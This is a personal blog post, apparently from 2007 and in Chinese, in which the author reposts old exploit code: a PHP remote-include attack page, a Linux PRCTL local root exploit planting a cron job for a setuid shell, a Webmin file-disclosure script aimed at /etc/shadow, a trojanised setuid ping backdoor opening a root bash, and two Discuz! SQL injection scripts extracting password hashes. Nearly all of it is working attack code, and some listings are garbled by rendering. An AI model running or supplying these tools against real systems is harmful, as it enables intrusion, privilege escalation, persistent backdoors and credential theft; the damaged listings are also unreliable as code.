小东西

Published on 2007 - 05 - 22

翻找以前的东西.找到以前写的一些小东西,自己都不记得了....
呵呵,丢上来,都是些没有技术含量的玩意

Remote Include File 的exp,利用的是php://input,所以要求对方php起码要有4.3.0版本以上:

<?php
/*
 * PHP include file exploit
 * Modified by wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
 * Date: Jun 24th 2006
 *
 * Self-posting helper page: the form below collects a target host, the
 * path up to the include() parameter and a PHP snippet; the second <?php
 * section at the bottom sends that snippet as the body of a raw HTTP POST
 * whose include parameter names php://input (hence the PHP 4.3.0 note).
 */

/**
 * Reverse magic_quotes_gpc escaping on a request array, in place.
 *
 * Iterates $array with each(). For every key that is not 'argc'/'argv'
 * and is either not all-uppercase or purely numeric, string values get
 * stripslashes() and nested arrays are processed recursively (the recursive
 * call's return value is written back over the nested entry).
 *
 * NOTE(review): each() and get_magic_quotes_gpc() no longer exist in
 * current PHP releases; this block only runs on PHP 4/5-era interpreters.
 *
 * @param array $array  request array such as $_GET / $_POST, by reference
 * @return array        the same (modified) array, also returned
 */
function stripslashes_array(&$array) {
    while (list($key,$var) = each($array)) {
        if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
            if (is_string($var)) {
                $array[$key] = stripslashes($var);
            }
            if (is_array($var)) {
                $array[$key] = stripslashes_array($var);
            }
        }
    }
    return $array;
}

// Undo magic_quotes escaping so the submitted values round-trip unchanged.
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
    $_POST = stripslashes_array($_POST);
}

// Form state, read from POST; empty string when a field is absent.
$server=isset($_POST['server'])?$_POST['server']:"";   // target host: used for fsockopen() and the Host: header
$file=isset($_POST['file'])?$_POST['file']:"";         // target path ending in the include() parameter name and "="
$iszero=isset($_POST['iszero'])?"checked":"";          // checkbox: append "%00" after the wrapper name
$cmd=isset($_POST['cmd'])?$_POST['cmd']:"";            // PHP snippet sent as the request body
// Note: only $cmd goes through htmlspecialchars() when echoed back into the
// form below; $server and $file are inserted into value="" unescaped.
?>

<style>
/* page styling only; nothing here affects the request that is sent */
body {font-family : sans-serif;background-color: #ffffff; color: #000000;}
b {font-family : Courier New, sans-serif;font-size : 24px;}
.center {text-align: center;}
input {
font-family: "Verdana";
font-size: "10px";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "2px solid #666666";
}
</style>

<!-- Input form. It posts back to this same page (action="") and re-fills
     each field from the PHP variables set in the section above. -->
<center><b>PHP include file exploit</b><br><font size="2px">Notice: this exploit cannot be used while target is below PHP 4.3.0</font></center><br><br>
<form action="" method="post" >
target server: <br>
<!-- server and file values are echoed without htmlspecialchars(), unlike cmd -->
<input type="text" name="server" value="<?=$server?>"><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") :<br>
<input type="text" name="file" value="<?=$file?>"><br>
add "%00": <input type="checkbox" <?=$iszero?> name="iszero"><br><br>
exec (enclose php commands between &lt;? .. ?&gt; tags):<br>
<input type="text" name="cmd" value="<?= htmlspecialchars($cmd);?>" ><br><br>
<INPUT type="submit" value="send">
</form>

<?php
// On submit: hand-build one raw HTTP/1.1 POST, send it with fsockopen(),
// then dump whatever comes back inside <pre>.
if(isset($_POST['cmd']))
{
    // Optional "%00" appended right after the wrapper name (the "add %00" checkbox).
    $zerochar = $iszero == "checked"?"%00":"";
    // Request line: $file is expected to end with the include parameter and "=",
    // so "php://input" becomes that parameter's value.
    $message = "POST /".$file."php://input".$zerochar." HTTP/1.1\r\n";
    // NOTE(review): the lone "/" at the end of this Accept header looks like a
    // garbled "*/*" from the original listing; left as on the page.
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, /\r\n";
    $message .= "Accept-Language: fr\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
    $message .= "Host: ".$server."\r\n";
    // Content-length covers $cmd only; the trailing "\r\n" appended below is not counted.
    $message .= "Content-length: ".strlen($cmd)."\r\n";
    // NOTE(review): Keep-Alive is requested, yet the read loop below runs until
    // feof(); a server that honours keep-alive may leave this page waiting.
    $message .= "Connection: Keep-Alive\r\n";
    $message .= "Cache-Control: no-cache\r\n";
    $message .= "\r\n";
    $message .= $cmd."\r\n";
    // Port 80 is fixed. NOTE(review): fsockopen() is not checked for failure,
    // so a refused connection hands an invalid handle to fputs()/feof().
    $fd = fsockopen( $server, 80 );
    fputs($fd,$message);
    $resp = "<pre>";
    while(!feof($fd)) {
        $resp .= fread($fd,1024);
    }
    fclose($fd);
    // The response is echoed unescaped: any markup the target returns is
    // rendered by the browser showing this page.
    $resp .="</pre>";
    echo $resp;
}
?>



这个是当时linux kernel PRCTL local poc,刚出来的时候我换了个shellcode,后来这个exp出了4个版本,各个都比我的好:)

/*****************************************************/
/*                                                   */
/*  Local r00t Exploit for:                          */
/*                                                   */
/*  Linux Kernel PRCTL Core Dump Handling            */
/*                                                   */
/*  Modified by wofeiwo 13.Jul.2006                  */
/*                                                   */
/*  -----------------------------------------------  */
/*                                                   */
/*  Based on:                                        */
/*                                                   */
/*  -----------------------------------------------  */
/*                                                   */
/*  By:                                              */
/*                                                   */
/*  - dreyer <luna@aditel.org> (main PoC code)       */
/*                                                   */
/*  - RoMaNSoFt <roman@rs-labs.com> (local root code)*/
/*                                                   */
/*  [ 10.Jul.2006 ]                                  */
/*                                                   */
/*****************************************************/

#include <stdio.h>
#
include <sys/time.h>
#
include <sys/resource.h>
#
include <unistd.h>
#
include <linux/prctl.h>
#
include <stdlib.h>
#
include <sys/types.h>
#
include <signal.h>

/*
 * Text that ends up in the child's core file. main() forks a child that
 * chdir()s to /etc/cron.d before being killed with SIGSEGV, so the dump is
 * written there and cron reads it as a crontab. The embedded entry compiles
 * a setuid root shell to /tmp/fakesh, runs it, and deletes /etc/cron.d/core.
 *
 * NOTE(review): "char payload=" (no pointer declarator) and the "</span>"
 * fragment appear to be rendering damage; the listing does not compile as shown.
 */
char payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root echo -e </span>"#include <stdio.h>\nint main(){\nsetuid(0);setgid(0);setreuid(0);system(\"/bin/sh\");return 0;\n}\n" > /tmp/fakesh.c;gcc -o /tmp/fakesh /tmp/fakesh.c;chmod +s /tmp/fakesh;rm -f /tmp/fakesh.c;/tmp/fakesh;rm -f /etc/cron.d/core\n";

/*
 * Entry point. Lifts the core-size limit, forks a child that moves into
 * /etc/cron.d and sets PR_SET_DUMPABLE to 2, kills that child with SIGSEGV
 * so its core file is written in the cron directory, waits 63 seconds, then
 * runs /tmp/fakesh (created by the cron entry carried in `payload`).
 *
 * None of setrlimit(), chdir(), prctl() or kill() is checked for failure,
 * and the parent never reaps the child.
 */
int main() {
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("Last modified By: wofeiwo (chage shellcode)\n");
    printf("Last edited: [ 13.Jul.2006 ]\n\n");

    /* unlimited core size so the dump is not suppressed by RLIMIT_CORE */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        /* child: the cwd decides where its core file lands */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);    /* parked until the parent's SIGSEGV arrives */
        exit(1);
    }

    kill(child, SIGSEGV);    /* force the core dump */

    printf("[*] Sleeping for aprox. one minute ( please wait )\n");
    sleep(63);    /* presumably gives cron time to notice the new file */

    printf("[*] Running shell (remember to remove /tmp/fakesh when finished) \n");
    system("/tmp/fakesh");
    return 0;
}


python写的,去年webmin 一个高危漏洞的exp

#!/usr/bin/python
# Webmin - Usermin Arbitrary File Disclosure Exploit
# Write by wofeiwo
# Date: July 10 2006

import sys, urllib, os

def usage (name):
    """Print the banner and usage text, with *name* substituted for the program name."""
    print "Webmin - Usermin Arbitrary File Disclosure Exploit\nWrite by wofeiwo <wofeiwo[0x40]gmail[dot]com>\n\nUsage: %s <target> <file>\nExamples: %s http://localhost:10000/ /etc/shadow\n" % (name, name)

def main ():
    """Request sys.argv[2] from the Webmin/Usermin instance at sys.argv[1] and print the body.

    Exactly two arguments are expected (target URL, file path); otherwise
    the usage text is printed and the process exits with status -1.
    """
    if len(sys.argv) != 3:
        (filepath, filename) = os.path.split(sys.argv[0])
        usage(filename)
        sys.exit(-1)
    else:
        # The target URL is concatenated as given (no check that it ends in "/").
        # NOTE(review): '"/..%01"61' does not parse as shown -- the listing was
        # damaged when the page was rendered.
        target = sys.argv[1] + "unauthenticated" + "/..%01"61 + "/" + sys.argv[2]
        sock = urllib.urlopen(target)
        getfile = sock.read()
        sock.close()
        print getfile

if __name__ == "__main__": main()  # script entry point


n年前写的替换系统ping的后门,因为ping是有s位的:)

#include <stdio.h>
#
include <unistd.h>
#
include <signal.h>
#
include <sys/param.h>
#
include <sys/types.h>
#
include <sys/stat.h>
#
include <unistd.h>
#
include <fcntl.h>
#
include <errno.h>

#define PWD "wofeiwo"

/* init the daemon, if success return 0 other <0 */
/*
 * Double-fork detach: fork, setsid(), ignore SIGHUP, fork again, then
 * chdir("/"), umask(0), close every descriptor below sysconf(_SC_OPEN_MAX)
 * and point fds 0-2 at /dev/null. Only reached from main() when argv[1]
 * matches PWD.
 *
 * Returns 0 on success and -1 if setsid() fails; both parents exit(0), so
 * only the grandchild ever returns to the caller.
 */
int daemon_init()
{
    struct sigaction act;
    int i, maxfd;

    if(fork() != 0) exit(0);
    if(setsid() < 0) return(-1);

    act.sa_handler = SIG_IGN;
    /* act.sa_mask = 0; */
    act.sa_flags = 0;    /* sa_mask is left uninitialised (the line above is commented out) */

    sigaction(SIGHUP, &act, 0);

    if(fork() != 0) exit(0);

    chdir("/");
    umask(0);
    maxfd = sysconf(_SC_OPEN_MAX);
    for(i=0; i<maxfd; i++)
        close(i);
    open("/dev/null", O_RDWR);    /* lowest free fd after the loop: 0 */
    dup(0);                       /* 1 */
    dup(1);                       /* 2 */
    dup(2);                       /* 3 -- an extra copy that is never used */
    return(0);
}

/*
 * Trojanised stand-in for /bin/ping (the page says the real binary is
 * setuid, which is what makes the uid/gid-0 calls below effective).
 *
 * argv[1] == PWD ("wofeiwo"): detach via daemon_init(), switch to uid/gid 0
 * and run system("/bin/bash"); the real ping is never executed.
 * Any other argv: execv() the real binary at /bin/ping with the original
 * argv, so ordinary use is indistinguishable from the genuine tool.
 *
 * NOTE(review): as rendered this does not compile -- "char argv[]" lacks
 * the pointer declarator, sig_chid is never declared, and strcmp()/strcpy()
 * are used without <string.h>. The argv_execv copy loop is dead code: its
 * result is never passed to execv(), and it strcpy()s argv[0..argc-1] into
 * 52 fixed 128-byte slots with no bounds check.
 *
 * Detection angle (from the code): a "ping" process that calls setsid()
 * and spawns /bin/bash as uid 0.
 */
int main(int argc, char argv[])
{
    int i,j=0;
    char argv_execv[52][128];
    char usage[] =
    "Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]\n"
    " [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]\n"
    " [-M mtu discovery hint] [-S sndbuf]\n"
    " [ -T timestamp option ] [ -Q tos ] [hop1 ] destination\n";

    if (argc == 1) printf("%s", usage);    /* mimic the real ping's no-argument output */
    if (argc > 1)
    {
        if (strcmp(PWD, argv[1]) == 0)
        {
            signal(SIGCHLD, sig_chid);    /* handler is not defined anywhere in this listing */
            daemon_init();
            seteuid(0);
            setuid(0);
            setgid(0);
            system("/bin/bash");
            return 1;
        }
        else
        {
            /* copies argv into argv_execv; the copy is never used */
            for (i = argc; i > 0; i--)
            {
                strcpy(argv_execv[j],argv[j]);
                j++;
            }
            strcpy(argv_execv[j], "\0");
            execv("/bin/ping", argv);    /* original argv passed straight through */
            return 1;
        }
    }
    return 0;
}



最后两个,都是dz5rc1的exp,一个c语言单线程,一个py的多线程,都是练手写的

/*
 * Discuz! 5.0.0 RC1 SQL injection PoC
 * Author: wofeiwo thx superheis help
 * Date: Aug 24th 2006
 */

#include <stdio.h>
#
include <stdlib.h>
#
include <winsock2.h>
#
include <windows.h>

#pragma comment (lib,"ws2_32")

#define PASSLEN 32


/*
 * Request-building tables. Each H* pair is {header name, header value};
 * HMod/HttpVer select method and version. HPost is a fixed login-form body
 * (throwaway credentials) so that logging.php processes the request.
 *
 * NOTE(review): pointer declarators were lost when the page was rendered
 * ("char HMod[]" etc. were string-pointer arrays) and the Accept value's
 * trailing "/" was "*" "/" "*"; kept as on the page.
 */
char HMod[] = { "GET","POST"};
char HttpVer[] = { "HTTP/1.0", "HTTP/1.1"};
char *HAccept[] = { "Accept:"," image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /"};
char HAcceptLg[] = { "Accept-Language:"," zh-cn"};
char HContentTp[]= { "Content-Type:"," application/x-www-form-urlencoded"};
char HAcceptEn[] = { "Accept-Encoding:"," gzip, deflate"};
char HUserAgent[]= { "User-Agent:"," Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)"};
char HReferer[]= { "REFERER:"," http://127.0.0.1/dz/logging.php?action=login"};
char HHost[]= { "Host: "};
char HContentLg[]= { "Content-Length:"," 189"};    /* sanddata() actually sends " 0" instead of [1] */
char HContion[]= { "Connection:"," Keep-Alive"};
char HCacheCtr[]= { "Cache-Control:"," no-cache"};
char HXForwardedFor[]= { "X-Forwarded-For:"};    /* the injected condition is sent as this header's value */
char HCookie[]= { "Cookie:"," cdb_sid=70KRjS; cdb_cookietime=2592000"};
char HPost[]= { "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=heige&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4" };

/*
 * Condition template: uid, 1-based character position, candidate byte value.
 * One request answers one (position, value) question; main() iterates the
 * candidates per position.
 */
char query[] = " ' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=%s AND ascii(substring(CONCAT(password),%d,1))=%d /*";
char querystring[128];

/*
 * temp1: outgoing request, cleared in sanddata() before each use.
 * temp2: response buffer, zeroed once here and never cleared again --
 * sanddata() appends at strlen(temp2), so earlier responses accumulate.
 */
char temp1[1024],temp2[10240] = {0};


/*
 * Send one probe request and classify the response.
 *
 * host/port/path/uid identify the target; `ascii` is the candidate byte
 * value and `chrnum` the 1-based character position substituted into
 * `query`. The request is assembled into the global temp1 and the reply
 * read into the global temp2.
 *
 * Returns `ascii` when the reply does NOT contain "ip3" (treated as the
 * true branch), 0 when it does, and 1 if WSAStartup() fails. On the first
 * position only (chrnum == 1) the request and reply are printed, and a
 * reply without "SELECT" or "array_merge" ends the program as
 * "Unvulnerable host".
 *
 * NOTE(review): pointer declarators in the signature, in `he`, `p`, the
 * in_addr cast and the SOCKADDR cast were lost in rendering. Beyond that,
 * as written: WSAStartup() is called on every probe and WSACleanup() never;
 * connect()/send() results are ignored; the recv() loop spins while recv()
 * returns <= 0, so a peer that closes without sending anything (recv() == 0)
 * makes it loop forever, and only the first successful recv() is consumed,
 * so a reply split across packets is truncated; and close() is used where
 * Winsock expects closesocket(). temp2 is never cleared between calls.
 */
int sanddata(char host, int port, char path, char uid, int ascii, int chrnum)
{
    WSADATA WSAData={0};
    struct hostent he;
    struct sockaddr_in ServerAddr={0};
    SOCKET Socket=0;
    int ren = 0;
    char p = NULL;

    if(WSAStartup(MAKEWORD(2,2), &WSAData)) return 1;

    if((he = gethostbyname(host)) == 0)
    {
        fprintf(stderr, "\r\n[-] Failed resolving %s\r\n", host);
        exit(-1);
    }

    Socket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

    ServerAddr.sin_family = AF_INET;
    ServerAddr.sin_addr = ((struct in_addr )he->h_addr);
    ServerAddr.sin_port = htons(port);

    /* Build the request: method/path/version line, twelve headers, blank
     * line, body. Content-Length is sent as " 0" although HPost follows. */
    memset(temp1,0,1024);
    sprintf(querystring, query, uid, chrnum, ascii);
    sprintf(temp1, "%s %s%s %s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "%s%s\r\n"
    "\r\n"
    "%s\r\n"
    "\r\n\r\n"
    ,
    HMod[1],path,"logging.php?action=login",HttpVer[1],
    HAccept[0],HAccept[1],
    HAcceptLg[0],HAcceptLg[1],
    HContentTp[0],HContentTp[1],
    HAcceptEn[0],HAcceptEn[1],
    HUserAgent[0],HUserAgent[1],
    HReferer[0],HReferer[1],
    HHost[0],host,
    HContentLg[0]," 0",
    HContion[0],HContion[1],
    HCacheCtr[0],HCacheCtr[1],
    HXForwardedFor[0],querystring,    /* injected condition travels in X-Forwarded-For */
    HCookie[0],HCookie[1],
    HPost[0]
    );
    if (chrnum == 1) printf("\r\n%s\r\n",temp1);    /* echo the first request for inspection */

    connect(Socket,(SOCKADDR )&ServerAddr,sizeof(ServerAddr));

    send(Socket,temp1,strlen(temp1),0);
    //sleep(1);
    /* busy-wait for the first successful recv(); appends after any earlier content in temp2 */
    while((ren = recv(Socket,temp2+strlen(temp2),10240-strlen(temp2),0))<=0){;}

    if (chrnum == 1) printf("\r\n%s\r\n",temp2);
    /* vulnerability check, first position only: expect a SQL error fragment in the reply */
    if(chrnum == 1 && (p = strstr(temp2, "SELECT")) == NULL && (p = strstr(temp2, "array_merge")) == NULL)
    {
        fprintf(stderr, "\r\n[-] Unvulnerable host\r\n");
        exit(1);
    }
    /* "ip3" absent -> candidate accepted for this position */
    if((p = strstr(temp2, "ip3")) == NULL)
    {
        close(Socket);
        return ascii;
    }

    close(Socket);
    return 0;
}

/*
 * Entry point: <host> <port> <path> <uid>. For each of PASSLEN (32) hash
 * positions, probes the digit candidates '0'..'9' and then letters starting
 * at 'b', printing the first candidate sanddata() accepts.
 *
 * Quirks visible in the loops: the letter range starts at 98, so a position
 * whose value is 'a' (97) is never tried; and because a hit is only printed
 * at the top of the *next* iteration, a hit on the last candidate (i == 122)
 * reaches `finded:` unprinted and is discarded when ret is reset.
 *
 * NOTE(review): "char argv[]" lost its pointer declarator in rendering.
 */
int main(int argc,char argv[])
{
    int i = 0,j = 0,ret = 0;

    fprintf(stdout, "Discuz! 5.0.0 RC1 SQL injection exploit\r\n");
    fprintf(stdout, "Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\r\n\r\n");

    if(argc != 5)
    {
        fprintf(stderr, "Usage: %s <host> <port> <path> <uid>\r\n", argv[0]);
        fprintf(stderr, "Example: %s localhost 80 /dz/ 1\r\n", argv[0]);
        exit(1);
    }

    fprintf(stdout, "[+] Connect %s\r\n", argv[1]);
    fprintf(stdout, "[+] Trying ..\r\n");
    fprintf(stdout, "[+] Plz wait a monment ..\r\n");
    fprintf(stdout, "[+] The uid = %s password hash is: ", argv[4]);

    for(j = 1; j <= PASSLEN; j++)    /* j: 1-based character position */
    {
        /* digits '0'..'9' */
        for(i = 48; i < 58; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);    /* ret holds the accepted byte value */
                goto finded;
            }
        }
        /* 'b'..'z' (starts at 98; 'a' is skipped) */
        for(i = 98; i < 123; i++)
        {
            if(ret == 0) ret = sanddata(argv[1], atoi(argv[2]), argv[3], argv[4], i, j);
            else
            {
                fprintf(stdout, "%c", ret);
                goto finded;
            }
        }
        /* a hit on i == 122 falls through to here without being printed */
finded: ret = 0;
    }

    fprintf(stdout, "\r\n");
    fprintf(stdout, "[+] Finished\r\n");

    return 0;
}



#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)
# Author: wofeiwo
# Date: Aug 13th 2006

import sys
import httplib
import threading
from urlparse import urlparse
from time import sleep

# Shared result table: hash position (1..32) -> recovered character.
# Filled by the worker threads; each thread writes only its own key.
password = {1:'',2:'',3:'',4:'',5:'',6:'',7:'',8:'',9:'',10:'',11:'',12:'',13:'',14:'',15:'',16:'',17:'',18:'',19:'',20:'',21:'',22:'',23:'',24:'',25:'',26:'',27:'',28:'',29:'',30:'',31:'',32:''}

class creatthread (threading.Thread):
    """One worker per hash position; the thread name doubles as the 1-based position."""
    def __init__ (self, threadname, url, u):
        self.realurl = url    # urlparse() result; element [1] is the netloc
        self.realu = u        # site path, made to end with '/' by main()
        threading.Thread.__init__(self, name = threadname)

    def run (self):
        # 32 is passed as the hash length, but injection() never reads it
        lenth = 32
        injection(lenth, self.realurl, self.realu, self.getName())

def injection (lenthofpass, realurl, path, num):
    """Recover one character of the target's password hash into ``password``.

    Worker body for creatthread. *num* is the 1-based position (the thread
    name, a str), *realurl* the urlparse() tuple, *path* the site path;
    *lenthofpass* is accepted but unused. For each candidate byte one POST
    to logging.php is sent with the condition in X-Forwarded-For; the first
    reply that lacks 'ip3' is taken as the match and stored under
    ``password[int(num)]``.
    """
    # candidate order: lowercase letters 97..122, then digits 48..57
    ran = range(97, 123)
    for a in range(48, 58): ran.append(a)

    for i in ran:
        # NOTE(review): the '</span>' prefix and the lone '/' before the closing
        # quote are rendering damage; this statement does not parse as shown.
        query = '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + num + ',1))=' + str(i) + ' /'
        header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
        # fixed login-form body (throwaway credentials) so logging.php handles the request
        data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
        #print header
        #sys.exit(1)
        http = httplib.HTTPConnection(realurl[1])    # fresh connection for every candidate
        http.request("POST", path + "logging.php?action=login&",data , header)
        sleep(1)
        response = http.getresponse()
        re1 = response.read()
        if re1.find('SELECT') == -1:
            # no SQL error text in the reply -> treated as not vulnerable.
            # NOTE(review): sys.exit() in a worker only raises SystemExit in this
            # thread; the other threads keep running.
            print '[-] Unvalnerable host'
            print '[-] Exit..'
            sys.exit(1);

        elif re1.find('ip3') == -1:
            password[int(num)] = chr(i)    # match for this position
            #print '[+] password ' + num + ': ' + chr(i)
            http.close()
            sleep(1)
            break
        #print re1
        #print '-----------------------------------------------'
        http.close()
        sleep(1)

def main ():
    """Parse <url> <uid>, start 32 worker threads (one per hash position) and print the result.

    Busy-waits until only the main thread is alive, then writes the 32
    collected characters in position order.
    """
    print 'Discuz! 5.0.0 RC1 SQL injection exploit (MultiThread Version)'
    print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

    if len(sys.argv) == 3:
        url = urlparse(sys.argv[1])
        # NOTE(review): url[2:-1] is a tuple slice of the parse result and can
        # never equal '/', so this branch is always taken: a path that already
        # ends in '/' gets a second one (url[2][-1] was presumably intended).
        if url[2:-1] != '/':
            u = url[2] + '/'
        else:
            u = url[2]
    else:
        print "Usage: %s <url> <uid>" % sys.argv[0]
        print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
        sys.exit(0)

    print '[+] Connect %s' % url[1]
    print '[+] Begin threads'
    print '[+] Plz wait a long long time'

    for a in range(1,33) :
        thread = creatthread(str(a), url, u)    # thread name == hash position
        thread.start()

    # spin until all workers have exited; the else: clause runs once the loop
    # condition turns false (no join() is used)
    while threading.activeCount() != 1:
        continue
    else:
        sys.stdout.write('[+] The uid=' + sys.argv[2] + ' password hash is: ' )
        for n in range(1, 33) :
            sys.stdout.write(password[n])
        sys.stdout.write('\n[+] Finished \n')


if __name__ == '__main__': main()  # script entry point
